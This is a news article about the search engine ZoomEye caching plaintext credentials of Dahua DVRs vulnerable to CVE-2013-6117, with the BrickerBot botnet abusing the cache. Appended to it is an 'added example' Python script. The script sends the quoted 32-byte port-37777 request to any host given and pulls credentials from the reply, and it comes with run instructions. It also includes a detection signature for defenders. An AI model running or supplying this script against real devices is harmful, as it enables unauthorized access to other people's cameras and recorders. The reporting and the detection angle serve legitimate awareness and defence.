When it comes to the internet of extremely insecure things, it's not a good sign when a security researcher warns that "a new low has been achieved in the ease of hacking IoT devices."

The ease of hacking to which Ankit Anubhav, principal researcher at NewSky Security, was referring is due to the IoT search engine ZoomEye caching the login passwords for tens of thousands of devices; more specifically, thousands of Dahua DVRs.

The actual vulnerability in Dahua DVRs, CVE-2013-6117, was discovered back in 2013 by Depth Security researcher Jake Reynolds.

[Screenshot: Google's suggested search results for the CVE. Credit: Google/IDG]

As the suggested search results show, plenty of people are aware of the five-year-old flaw. Yet that doesn't mean that people with Dahua DVRs updated the vulnerable firmware versions 2.608.0000.0 or 2.608.GV00.0 after a patch was made available.

What Anubhav discovered was that attackers need not connect to the vulnerable Dahua DVRs to obtain the credentials, since ZoomEye has already scanned the devices and stored those credentials for anyone to find.

"So CVE-2013-6117 = just connect to port 37777 to get the creds which is stored in plaintext. But the attackers do not even need to write code to connect to the port as they can login to public scanner like ZoomEye which store the output of requests in their website and dump it. pic.twitter.com/M2MyYJ16D9"
— Ankit Anubhav (@ankit_anubhav), July 12, 2018

BrickerBot is bricking vulnerable Dahua DVRs

In fact, Anubhav noted that the BrickerBot author has used the IoT search engine to find and brick vulnerable Dahua DVRs. The BrickerBot botnet, as you likely recall, would brick unsecured IoT devices before they could be added to Mirai or other IoT botnets. The BrickerBot author, "Janitor," claimed that even though the vulnerability was five years old, ZoomEye's cache of credentials covered 30,000 vulnerable Dahua DVR devices.

"The sheer amount of devices having their credentials stored in a scanning site is just amazing. And this is already abused by BrickerBot author, as he mentioned in his messages to the public that 30,000 devices have this issue."
— Ankit Anubhav (@ankit_anubhav), July 12, 2018

Anubhav added:

"Just to make things clear to weaponize the exploit, one needs to connect to port 37777 on raw TCP + send the following message to get the ddns creds "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00\x8c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" https://t.co/Z6I4uVp9sK"
— Ankit Anubhav (@ankit_anubhav), July 13, 2018

Furthermore, as is commonly the case, thousands upon thousands of devices are "secured" with shoddy passwords.

"And of course, people here too have not failed to put extremely generic passwords. https://t.co/usZ46tftMT 270 devices have password as "admin123" lol. Brickerbot is known to brick the devices he pwns, so it does not look like a happy ending for these devices. @GDI_FDN"
— Ankit Anubhav (@ankit_anubhav), July 12, 2018

With just three search attempts on ZoomEye, Bleeping Computer's Catalin Cimpanu found about 30,000 vulnerable Dahua devices: roughly "15,800 Dahua devices with a password of 'admin', over 14,000 with a password of '123456,' and over 600 with a password of 'password'."

Anubhav tweeted:

"Wow and how did I miss this. 13900+ of these devices have their password as "123456" Check here https://t.co/1fSJX4KcWG #iot #security #fail This specific case was brought to my attention by another known botnet operator. So again, RIP to these devices. https://t.co/OAzmy7GnY8"
— Ankit Anubhav (@ankit_anubhav), July 13, 2018

Although Anubhav had not heard back from the owner of ZoomEye after requesting that the results be scrubbed, Bleeping Computer was told by the owner that "'blocking data in ZoomEye doesn't solve the problem' and that he doesn't plan on removing this data."

Dahua DVR users should update their firmware

If you have a Dahua device and don't have a clue what firmware it is running, Dahua Technology advised finding the model number on your device and entering it in the firmware search tool, or using the DVR firmware toolkit that can be downloaded from the same page. Note that the update closes the hole but does not undo the exposure: a DVR whose port 37777 is reachable from the internet will keep being scanned and cached by ZoomEye and its peers whatever firmware it runs, so keep that port off the public internet, and because the cached credentials are already public, change the passwords after updating.

Otherwise, as Anubhav pointed out, you might as well say bye-bye to devices running ancient vulnerable firmware when there are sites such as ZoomEye caching credentials and making hacking IoT devices even easier.
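The request Anubhav quotes is the entire exploit, so it is worth seeing it as bytes rather than as a hex string in a tweet. The script below is an added example, not code from the article, from Anubhav or from Dahua. It assembles the 32-byte message from the tweet, sends it over a raw TCP connection to port 37777, and also serves the defensive side: the same constant is the signature a packet capture on 37777 can be matched against. Two assumptions are labelled in the code: the article does not document the reply format, so credentials are recovered `strings`-style as runs of printable ASCII rather than by parsing the real Dahua structure, and the sample reply is constructed so the script runs offline.

```python
import socket

DAHUA_PORT = 37777

# The 32-byte request from Anubhav's tweet, read as bytes: an 0xa3 header,
# the ASCII word "config", then 0x8c, each NUL-padded. Nothing else about
# the Dahua protocol is taken from the article.
CONFIG_REQUEST = (
    b"\xa3" + b"\x00" * 7
    + b"config" + b"\x00" * 2
    + b"\x8c" + b"\x00" * 15
)


def build_config_request() -> bytes:
    """Return the request bytes to send on a raw TCP connection to 37777."""
    return CONFIG_REQUEST


def extract_plaintext(blob: bytes, min_len: int = 4) -> list:
    """Pull runs of printable ASCII out of a reply, `strings`-style.

    Assumption: the article only says the credentials come back in
    plaintext and does not document the reply layout, so this is not a
    parser for the real Dahua structure.
    """
    found, run = [], bytearray()
    for byte in blob + b"\x00":  # trailing NUL flushes the final run
        if 0x20 <= byte <= 0x7E:
            run.append(byte)
            continue
        if len(run) >= min_len:
            found.append(run.decode("ascii"))
        run = bytearray()
    return found


def is_config_probe(payload: bytes) -> bool:
    """Detection side: does a captured TCP payload begin with the request?

    A match on traffic to port 37777 means someone sent the CVE-2013-6117
    config dump request at the device.
    """
    return payload.startswith(CONFIG_REQUEST)


def probe(host: str, port: int = DAHUA_PORT, timeout: float = 5.0) -> bytes:
    """Send the request to a device you own and return whatever it answers."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(CONFIG_REQUEST)
        chunks = []
        try:
            while True:
                data = sock.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass  # device stopped talking; use what we have
    return b"".join(chunks)


# Constructed stand-in for a reply so the script runs offline: NUL-padded
# fields holding an ASCII user name and password. It is not a real capture
# and follows no documented Dahua layout.
SAMPLE_REPLY = (
    b"\x00" * 8
    + b"ddns" + b"\x00" * 4
    + b"user=admin\x00"
    + b"pass=123456\x00"
    + b"\x00" * 8
)


if __name__ == "__main__":
    import sys

    # With a host argument the request goes to that device; without one the
    # constructed sample reply is used.
    reply = probe(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_REPLY
    for text in extract_plaintext(reply):
        print(text)
```

Run it without arguments to see the string extraction on the constructed reply, or with the address of a DVR you own to send the real request. The point of `is_config_probe` is that the offensive constant doubles as an IDS signature: any inbound payload on 37777 beginning with these 32 bytes is an attempt at this CVE, whatever the firmware version.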